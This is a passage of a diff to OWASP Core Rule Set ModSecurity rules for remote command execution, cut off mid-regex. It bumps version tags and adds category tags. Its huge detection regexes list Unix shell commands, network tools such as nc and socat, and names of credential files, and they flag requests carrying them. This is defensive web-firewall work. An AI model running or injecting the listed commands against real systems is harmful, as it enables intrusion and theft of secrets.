b&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\x0b&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\x0b&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\x0b&\)<>\|]|p[^\s\x0b]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\x0b&\)<>\|]|int(?:env|f[\s\x0b&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\x0b&\)<>\|]|shd)|y(?:thon[23]|3?versions))|r(?:a(?:r[\s\x0b&\)<>\|]|k(?:e[\s\x0b&\)<>\|]|u))|c(?:p[\s\x0b&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\x0b&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\)<>\|]|user)|pm(?:[\s\x0b&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\x0b&\)<>\|]|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|(?:hed|r(?:een|ipt))[\s\x0b&\)<>\|])|e(?:(?:d|lf|rvice)[\s\x0b&\)<>\|]|t(?:(?:facl)?[\s\x0b&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash)[\s\x0b&\)<>\|]|h(?:(?:adow|ells)?[\s\x0b&\)<>\|]|\.distrib|u(?:f|tdown[\s\x0b&\)<>\|]))|s(?:[\s\x0b&\)<>\|]|h(?:[\s\x0b&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\x0b&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\x0b&\)<>\|]|il[\s\x0b&\)<>f\|]|sk(?:[\s\x0b&\)<>\|]|set))|bl|c(?:p(?:[\s\x0b&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\x0b&\)<>\|]|lnet)|i(?:c[\s\x0b&\)<>\|]|me(?:datectl|out[\s\x0b&\)<>\|]))|o(?:p|uch[\s\x0b&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\)<>\|]|diff)|ew[\s\x0b&\)<>\|]|gr|pw|rsh|sudo)|algrind|olatility[\s\x0b&\)<>\|])|w(?:c|a(?:ll|tch)[\s\x0b&\)<>\|]|h(?:iptail[\s\x0b&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\x0b&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\x0b&\)<>\|]|um)|z(?:ip(?:[\s\x0b&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|less|more|run|ypper))" \
+SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z(?:[\s\x0b&\),<>\|]|$|[arx](?:[\s\x0b&\),<>\|]|$))|a(?:(?:b|w[ks]|l(?:ias|pine)|tobm|xel)(?:[\s\x0b&\),<>\|]|$)|pt(?:[\s\x0b&\),<>\|]|$|-get)|r(?:[\s\x0b&\),<>\|]|$|j(?:[\s\x0b&\),<>\|]|$|-register|disp)|(?:p|ch)(?:[\s\x0b&\),<>\|]|$)|ia2c)|s(?:h(?:[\s\x0b&\),<>\|]|$)|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible)|b(?:z(?:(?:z|c(?:at|mp))(?:[\s\x0b&\),<>\|]|$)|diff|e(?:grep|xe(?:[\s\x0b&\),<>\|]|$))|f?grep|ip2(?:[\s\x0b&\),<>\|]|$|recover)|less|more)|a(?:s(?:e(?:32|64|n(?:ame(?:[\s\x0b&\),<>\|]|$)|c))|h(?:[\s\x0b&\),<>\|]|$))|tch(?:[\s\x0b&\),<>\|]|$))|lkid(?:[\s\x0b&\),<>\|]|$)|pftrace|r(?:eaksw|idge(?:[\s\x0b&\),<>\|]|$))|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler(?:[\s\x0b&\),<>\|]|$)|zip2)|s(?:ctl|ybox))|y(?:ebug|obu(?:[\s\x0b&\),<>\|]|$)))|c(?:[89]9(?:[\s\x0b&\),<>\|]|$|-gcc)|(?:a(?:t|ncel|psh)|c|mp)(?:[\s\x0b&\),<>\|]|$)|p(?:[\s\x0b&\),<>\|]|$|io(?:[\s\x0b&\),<>\|]|$)|ulimit)|s(?:(?:h|cli)(?:[\s\x0b&\),<>\|]|$)|plit|vtool)|u(?:t(?:[\s\x0b&\),<>\|]|$)|psfilter)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)(?:[\s\x0b&\),<>\|]|$)|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f(?:[\s\x0b&\),\-<>\|]|$))|(?:flag|pas)s|g(?:passwd|rp(?:[\s\x0b&\),<>\|]|$)))|lang(?:[\s\x0b&\),<>\|]|$|\+\+)|o(?:bc(?:[\s\x0b&\),<>\|]|$|run)|lumn(?:[\s\x0b&\),<>\|]|$)|m(?:m(?:[\s\x0b&\),<>\|]|$|and(?:[\s\x0b&\),<>\|]|$))|p(?:oser|ress)(?:[\s\x0b&\),<>\|]|$))|proc|w(?:say|think))|r(?:ash(?:[\s\x0b&\),<>\|]|$)|ontab))|d(?:(?:[dfu]|i(?:(?:alo)?g|ff)|ash|vips)(?:[\s\x0b&\),<>\|]|$)|hclient|m(?:esg(?:[\s\x0b&\),<>\|]|$)|idecode|setup)|o(?:(?:as|ne)(?:[\s\x0b&\),<>\|]|$)|cker(?:[\s\x0b&\),\-<>\|]|$)|sbox)|pkg(?:[\s\x0b&\),\-<>\|]|$))|e(?:(?:b|qn|cho|fax|grep|macs|val)(?:[\s\x0b&\),<>\|]|$)|n(?:v(?:[\s\x0b&\),<>\|]|$|-update)|d(?:if|sw)(?:[\s\x0b&\),<>\|]|$))|s(?:[\s\x0b&\),<>\|]|$|(?:h|ac)(?:[\s\x0b&\),<>\|]|$))|x(?:[\s\x0b&\),<>\|]|$|(?:ec|p(?:and|(?:ec|or)t|r))(?:[\s\x0b&\),<>\|]|$)|iftool)|2fsck|asy_install)|f(?:(?:c|mt|etch|lock|unction)(?:[\s\x0b&\),<>\|]|$)|d(?:[\s\x0b&\),<>\|]|$|(?:find|isk)(?:[\s\x0b&\),<>\|]|$)|u?mount)|g(?:[\s\x0b&\),<>\|]|$|rep(?:[\s\x0b&\),<>\|]|$))|i(?:[\s\x0b&\),<>\|]|$|letest|(?:n(?:d|ger)|sh)(?:[\s\x0b&\),<>\|]|$))|tp(?:[\s\x0b&\),<>\|]|$|stats|who)|acter|o(?:ld(?:[\s\x0b&\),<>\|]|$)|reach)|ping(?:[\s\x0b&\),6<>\|]|$))|g(?:c(?:c[^\s\x0b]{1,10}\b|ore(?:[\s\x0b&\),<>\|]|$))|(?:db|i(?:t|mp|nsh)|o|pg|awk|z(?:cat|exe|ip))(?:[\s\x0b&\),<>\|]|$)|e(?:(?:m|tfacl)(?:[\s\x0b&\),<>\|]|$)|ni(?:e(?:[\s\x0b&\),<>\|]|$)|soimage))|hc(?:[\s\x0b&\),<>\|]|$|-(?:[\s\x0b&\),<>\|]|$)|i(?:[\s\x0b&\),\-<>\|]|$))|r(?:c(?:[\s\x0b&\),<>\|]|$|at(?:[\s\x0b&\),<>\|]|$))|ep(?:[\s\x0b&\),<>\|]|$)|oup(?:[\s\x0b&\),<>\|]|$|mod))|tester|unzip)|h(?:(?:d|up|i(?:ghlight|story))(?:[\s\x0b&\),<>\|]|$)|e(?:ad(?:[\s\x0b&\),<>\|]|$)|xdump)|ost(?:id|name)|ping3|t(?:digest|op(?:[\s\x0b&\),<>\|]|$)|passwd))|i(?:p(?:[\s\x0b&\),<>\|]|$|6?tables|config|p(?:eveprinter|find|tool))|(?:rb|conv)(?:[\s\x0b&\),<>\|]|$)|f(?:config|top(?:[\s\x0b&\),<>\|]|$))|onice|spell)|j(?:(?:js|q|exec)(?:[\s\x0b&\),<>\|]|$)|o(?:(?:bs|in)(?:[\s\x0b&\),<>\|]|$)|urnalctl)|runscript)|k(?:s(?:h(?:[\s\x0b&\),<>\|]|$)|shell)|ill(?:[\s\x0b&\),<>\|]|$|all)|nife(?:[\s\x0b&\),<>\|]|$))|l(?:d(?:[\s\x0b&\),<>\|]|$|d(?:[\s\x0b&\),<>\|]|$)|config)|(?:[np]|ynx)(?:[\s\x0b&\),<>\|]|$)|s(?:[\s\x0b&\),<>\|]|$|(?:-F|cpu|hw|mod|of|pci|usb)(?:[\s\x0b&\),<>\|]|$)|b_release)|ua(?:[\s\x0b&\),<>\|]|$|(?:la)?tex)|z(?:[\s\x0b&\),<>\|]|$|4(?:[\s\x0b&\),<>\|]|$|c(?:[\s\x0b&\),<>\|]|$|at))|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|$|dec|info)|ore))|a(?:st(?:[\s\x0b&\),<>\|]|$|comm(?:[\s\x0b&\),<>\|]|$)|log(?:in)?)|tex(?:[\s\x0b&\),<>\|]|$))|ess(?:[\s\x0b&\),<>\|]|$|echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|$|get)|o(?:(?:ca(?:l|te)|ok)(?:[\s\x0b&\),<>\|]|$)|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|il[qx]|ke|wk)(?:[\s\x0b&\),<>\|]|$)|ster\.passwd)|(?:tr|v|utt)(?:[\s\x0b&\),<>\|]|$)|k(?:(?:dir|nod)(?:[\s\x0b&\),<>\|]|$)|fifo|temp)|locate|o(?:squitto|unt(?:[\s\x0b&\),<>\|]|$))|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|$|admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:[\s\x0b&\),<>\|]|$|\.(?:openbsd|traditional)|at(?:[\s\x0b&\),<>\|]|$))|e(?:t(?:[\s\x0b&\),<>\|]|$|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:l|p(?:m|ing)|a(?:no|sm|wk)|ice|o(?:de|hup)|roff)(?:[\s\x0b&\),<>\|]|$)|m(?:[\s\x0b&\),<>\|]|$|ap(?:[\s\x0b&\),<>\|]|$))|s(?:enter|lookup|tat(?:[\s\x0b&\),<>\|]|$)))|o(?:(?:d|ctave)(?:[\s\x0b&\),<>\|]|$)|nintr|p(?:en(?:ssl|v(?:pn|t))|kg(?:[\s\x0b&\),<>\|]|$)))|p(?:a(?:(?:x|rted|tch)(?:[\s\x0b&\),<>\|]|$)|s(?:swd|te(?:[\s\x0b&\),<>\|]|$)))|d(?:b(?:[\s\x0b&\),<>\|]|$|2mb|3(?:[\s\x0b&\),\.<>\|]|$))|f(?:la)?tex|ksh(?:[\s\x0b&\),<>\|]|$))|f(?:[\s\x0b&\),<>\|]|$|tp(?:[\s\x0b&\),<>\|]|$))|i(?:c(?:[\s\x0b&\),<>\|]|$|o(?:[\s\x0b&\),<>\|]|$))|p[^\s\x0b]{1,10}\b|dstat|(?:gz|ng)(?:[\s\x0b&\),<>\|]|$))|k(?:g(?:[\s\x0b&\),<>\|]|$|_?info)|exec|ill(?:[\s\x0b&\),<>\|]|$))|r(?:[\s\x0b&\),<>\|]|$|y(?:[\s\x0b&\),<>\|]|$)|int(?:env|f(?:[\s\x0b&\),<>\|]|$)))|t(?:x(?:[\s\x0b&\),<>\|]|$)|ar(?:[\s\x0b&\),<>\|]|$|diff|grep))|wd(?:[\s\x0b&\),<>\|]|$|\.db)|(?:xz|grep|opd|u(?:ppet|shd))(?:[\s\x0b&\),<>\|]|$)|er(?:(?:f|ms)(?:[\s\x0b&\),<>\|]|$)|l(?:5?(?:[\s\x0b&\),<>\|]|$)|sh))|hp(?:-cgi|[57](?:[\s\x0b&\),<>\|]|$))|s(?:(?:ed|ql)(?:[\s\x0b&\),<>\|]|$)|ftp)|y(?:3?versions|thon[23]))|r(?:(?:a(?:r|k[eu])|bash|nano|oute|vi(?:ew|m))(?:[\s\x0b&\),<>\|]|$)|c(?:[\s\x0b&\),<>\|]|$|p(?:[\s\x0b&\),<>\|]|$))|e(?:d(?:[\s\x0b&\),<>\|]|$|carpet(?:[\s\x0b&\),<>\|]|$))|(?:v|boot|place)(?:[\s\x0b&\),<>\|]|$)|a(?:delf|lpath)|stic)|m(?:[\s\x0b&\),<>\|]|$|dir(?:[\s\x0b&\),<>\|]|$)|user)|pm(?:[\s\x0b&\),<>\|]|$|db(?:[\s\x0b&\),<>\|]|$)|(?:quer|verif)y)|l(?:ogin|wrap)|sync(?:-ssl|[\s\x0b&\),<>\|]|$)|u(?:by[^\s\x0b]{1,10}\b|n-(?:mailcap|parts)))|s(?:(?:c(?:p|hed|ript)|g|ash|diff|ftp|l(?:eep|sh))(?:[\s\x0b&\),<>\|]|$)|e(?:(?:d|ndmail|rvice)(?:[\s\x0b&\),<>\|]|$)|t(?:[\s\x0b&\),<>\|]|$|arch|env|facl(?:[\s\x0b&\),<>\|]|$)|sid))|h(?:[\s\x0b&\),<>\|]|$|\.distrib|(?:adow|ells|u(?:f|tdown))(?:[\s\x0b&\),<>\|]|$))|sh(?:[\s\x0b&\),<>\|]|$|-key(?:ge|sca)n|pass)|u(?:[\s\x0b&\),<>\|]|$|do(?:[\s\x0b&\),<>_\|]|$|edit|replay))|vn(?:[\s\x0b&\),<>\|]|$|a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|mbclient|o(?:cat(?:[\s\x0b&\),<>\|]|$)|elim)|p(?:lit(?:[\s\x0b&\),<>\|]|$)|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in(?:[\s\x0b&\),<>\|]|$)|out)|r(?:ace|ings(?:[\s\x0b&\),<>\|]|$)))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:[cr](?:[\s\x0b&\),<>\|]|$)|il(?:[\s\x0b&\),<>\|]|$|f(?:[\s\x0b&\),<>\|]|$))|skset)|(?:bl|o(?:p|uch)|ftp|mux)(?:[\s\x0b&\),<>\|]|$)|c(?:p(?:[\s\x0b&\),<>\|]|$|dump|ing|traceroute)|l?sh(?:[\s\x0b&\),<>\|]|$))|e(?:[ex](?:[\s\x0b&\),<>\|]|$)|lnet)|i(?:c(?:[\s\x0b&\),<>\|]|$)|medatectl)|r(?:aceroute6?|off(?:[\s\x0b&\),<>\|]|$))|shark)|u(?:dp(?:[\s\x0b&\),<>\|]|$)|l(?:[\s\x0b&\),<>\|]|$|imit(?:[\s\x0b&\),<>\|]|$))|n(?:(?:compress|iq|rar|s(?:et|hare)|xz)(?:[\s\x0b&\),<>\|]|$)|expand|l(?:ink(?:[\s\x0b&\),<>\|]|$)|z(?:4(?:[\s\x0b&\),<>\|]|$)|ma))|pigz|z(?:ip(?:[\s\x0b&\),<>\|]|$)|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\),<>\|]|$|diff)|(?:gr|pw|rsh)(?:[\s\x0b&\),<>\|]|$)|sudo)|algrind|olatility(?:[\s\x0b&\),<>\|]|$))|w(?:(?:c|atch)(?:[\s\x0b&\),<>\|]|$)|h(?:iptail(?:[\s\x0b&\),<>\|]|$)|oami)|i(?:reshark|sh(?:[\s\x0b&\),<>\|]|$)))|x(?:(?:(?:x|pa)d|args|term)(?:[\s\x0b&\),<>\|]|$)|z(?:[\s\x0b&\),<>\|]|$|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|d(?:ec(?:[\s\x0b&\),<>\|]|$)|iff)|[ef]?grep|less|more)|e(?:latex|tex(?:[\s\x0b&\),<>\|]|$))|mo(?:dmap|re(?:[\s\x0b&\),<>\|]|$)))|y(?:um|arn|elp)(?:[\s\x0b&\),<>\|]|$)|z(?:ip(?:[\s\x0b&\),<>\|]|$|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h(?:[\s\x0b&\),<>\|]|$)|oelim|td(?:[\s\x0b&\),<>\|]|$|(?:ca|m)t|grep|less))|athura|(?:c(?:at|mp)|diff|grep|less|more|run)(?:[\s\x0b&\),<>\|]|$)|e(?:grep|ro(?:[\s\x0b&\),<>\|]|$))|fgrep|ypper))" \
     "id:932239,\
     phase:1,\
     block,\
@@ -1469,9 +1534,10 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)(?:^|b[\"'\)
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1504,16 +1570,17 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@pmFromFile unix-she
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
@@ -1556,7 +1623,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,tag:'O
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932232
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(